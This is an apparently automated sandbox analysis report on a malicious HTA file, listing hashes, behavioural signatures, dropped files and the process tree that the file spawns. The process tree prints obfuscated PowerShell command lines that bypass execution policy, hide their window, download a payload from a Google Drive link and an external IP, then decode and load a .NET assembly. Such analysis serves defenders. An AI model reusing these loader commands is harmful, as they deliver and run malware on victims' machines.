Analysis
max time kernel: 91s
max time network: 97s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 30-10-2024 07:23
Static task: static1
Behavioral task: behavioral1
  Sample: greatthingswithmegood.hta
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: greatthingswithmegood.hta
  Resource: win10v2004-20241007-en
General
Target: greatthingswithmegood.hta
Size: 169KB
MD5: d61ef0038de65f697abb0b7a21b499db
SHA1: f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
SHA256: 8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
SHA512: 3ce0e7e8302d6b6c23ea209b07640be3b616306494d065c0293885bed194002f92bc41f4329f18465dd0ad77087afa6ce5a30a585e422f08a017306040986223
SSDEEP: 48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  3     2276  POWeRSHell.eXE
  6     3056  powershell.exe
  8     3056  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Runs PowerShell and hides the display window.
  pid   Process
  2308  powershell.exe
  3056  powershell.exe
Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  2276  POWeRSHell.eXE
  3044  powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  5     drive.google.com
  6     drive.google.com
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                        Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  POWeRSHell.eXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
Modifies Internet Explorer settings
  description  ioc                                                                                              Process
  Key created  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid   Process
  2276  POWeRSHell.eXE
  3044  powershell.exe
  2276  POWeRSHell.eXE
  2276  POWeRSHell.eXE
  2308  powershell.exe
  3056  powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   2276  POWeRSHell.eXE
  Token: SeDebugPrivilege   3044  powershell.exe
  Token: SeDebugPrivilege   2308  powershell.exe
  Token: SeDebugPrivilege   3056  powershell.exe
Suspicious use of WriteProcessMemory (28 IoCs; each row below was recorded 4 times)
  description                        pid   Process          procid_target
  PID 2608 wrote to memory of 2276   2608  mshta.exe        29
  PID 2276 wrote to memory of 3044   2276  POWeRSHell.eXE   31
  PID 2276 wrote to memory of 2712   2276  POWeRSHell.eXE   32
  PID 2712 wrote to memory of 2792   2712  csc.exe          33
  PID 2276 wrote to memory of 1740   2276  POWeRSHell.eXE   35
  PID 1740 wrote to memory of 2308   1740  WScript.exe      36
  PID 2308 wrote to memory of 3056   2308  powershell.exe   38
Processes
[1] C:\Windows\SysWOW64\mshta.exe (PID 2608)
    Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegood.hta"
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\windOWSPowerShell\V1.0\POWeRSHell.eXE (PID 2276)
      Command line: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'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'+[cHAr]34+'))')))"
      - Blocklisted process makes network request
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3044)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
        - Evasion via Device Credential Deployment
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 2712)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_0th7eoa.cmdline"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 2792)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC889.tmp"
          - System Location Discovery: System Language Discovery
    [3] C:\Windows\SysWOW64\WScript.exe (PID 1740)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2308)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3056)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 1KB
MD5: 1b6ed0be8a713b68e85bef96b588153e
SHA1: 6c00a159afc31259931034fba3b34c78d88e61fd
SHA256: 5c97bd8b5807ec2b8bd322a6ec06108979d1f97def7fae5a1b2f017e04332542
SHA512: 09c1e0c806631c18f7b4c7cff25a13472e6ee0d4bd2d217787033577ac465265221bf6ed75351bb49010e4e12258cc9ccdd57c72a8b8caefe9de91ef976602cc

Filesize: 3KB
MD5: b3c012dcb1fe9c3b557c6d994b172c65
SHA1: ea0e832bcc203abd17d03817809066f8c024f30b
SHA256: 0706963d4e43097a5694ca261ccde9fd5ec0699095652779c92cfaf03efdea3e
SHA512: 8b620c5157b57378f89424c79fb4296f984fbdaa7b81fef97606768fd2778b0d59846465063607dc06e3f5f998ad6857e7792b446eab37f67b67470ec2c42094

Filesize: 7KB
MD5: 591e095fbd0ddc938e1ec896c1d9d277
SHA1: 51a9f67e311108f66df5dc967546158992f47487
SHA256: 7b80486f5356e7c294f6b9ed9b328b054139e656f2fe9fafe245e257bee478e8
SHA512: a9ff902c1feab0f996d6c78bd87ca2fc12d80228fae8f17ef559e30a6f93f594a3c87b85929fa686a94dc84f74a338c92d49c48abcfd5febad06dc9fd4b61d14

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 64e56e1593feaf351b31ee4fe1505e96
SHA1: 80422ac5cb70fc08df7143a382dd055d5db134c9
SHA256: ff80ed35e241ba8c384d5f3d6dc830551312aa4bb081ba4168d09595facab7df
SHA512: 2e70fa7af57a3426f97fec2e72c4f8127dd947ba306d1b54cc180026411a326636950ba3708288ee542789336fd394f453db9af210d38481d98fa215d7053ca4

Filesize: 138KB
MD5: 64cc9748329c0e186cacd10d639615e6
SHA1: 1291f245b185bd05fb09646b79f284d76e7dc0ff
SHA256: 2c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d
SHA512: 65ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba

Filesize: 652B
MD5: d3b474da9beb6e2dd3d386f424a5db97
SHA1: be1b1c25adb21ace2bd9edcef1d9e57b04984cc0
SHA256: ad7e3d9472113d3bf182a1f5f51e7e72f3bb254a90820efec9da43ece7a231b9
SHA512: b3406e644cce69c0ddaeda9adc264c5711f99f7ee335411ea562826c3709f48d343064bc3bfcb605434e4b99575b2569a738e929dcbdf916784617dd90add82f

Filesize: 487B
MD5: 8165df8b1b6d49c15b5e65811de25b8c
SHA1: fbe4fe188254b23c8b57b8d1bcd56011a93f34ba
SHA256: 063172ff26517cdf762b144b713c24d423f75c6493234773c0e241c060dfa9f9
SHA512: ede5171453ece61e25baf3eef0a842e92a2b2c47c06bd4ed416f9c0a42e2bbc29f1810b97e4041dcdfd53995fc0e268f20a39188db553cf272b0374994473a2d

Filesize: 309B
MD5: 8cbb4584ddac1f856aa7ba8002689266
SHA1: bb504f68be0a3d65a27d7f5d0ef74c3bfbe709a5
SHA256: 48bcb8d5dc5e95713681571ce91e697433330b34ca80c7c5b8fc8a4c5def9c7b
SHA512: 71604f0fc047b478bf7c43a3d6098435e2bb22d4ff3d0648b1e3460ab75fec0efb06b3e6a5230c24b366c9b266e3e6bb30c7ac1ac2a23d5915b4b64dbd99f638